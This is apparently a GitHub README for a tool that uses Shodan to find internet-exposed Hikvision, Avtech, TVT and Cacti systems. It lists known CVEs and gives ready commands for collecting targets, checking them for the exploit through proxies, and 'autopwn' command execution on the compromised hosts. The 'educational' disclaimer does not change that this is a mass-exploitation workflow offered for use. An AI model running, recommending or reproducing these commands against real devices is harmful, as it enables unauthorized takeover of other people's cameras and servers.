TasosY2K / camera-exploit-tool

Automated exploit scanner for cameras on the internet
GNU General Public License v3.0
170 stars 34 forks source link
camera camera-exploitation camera-hacking exploit iot scanner shodan vulnerability

Internet Camera Exploitation Tool

This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io

I was able to discover thousands of vulnerable cameras using it

Vendors Affected

[+] Hikvision

[+] Avtech

[+] TVT

[+] Cacti

more to come...



To use this tool you need to have the following:


git clone https://github.com/TasosY2K/camera-exploit-tool
pip install -r requirements.txt
python3 scanner.py --help


Collect hosts in database
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Hikvision IP Camera"' --pages 1

# Collect Avtech hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'linux upnp avtech' --pages 1

# Collect TVT hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Cross Web Server"' --pages 1

# Collect Cacti hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'Login to Cacti' --pages 1
Check hosts for exploit
python3 scanner.py --check --proxy-file proxies.txt --threads 20
Automatically run command on exploited hosts
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"

About this tool

This tool is purely educational and is inteded to make the internet more secure

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Any PR's or suggestions on improving this project are welcome

Exploits Used


2021-36260 https://www.exploit-db.com/exploits/50441


CVE-2022-46169 https://github.com/sAsPeCt488/CVE-2022-46169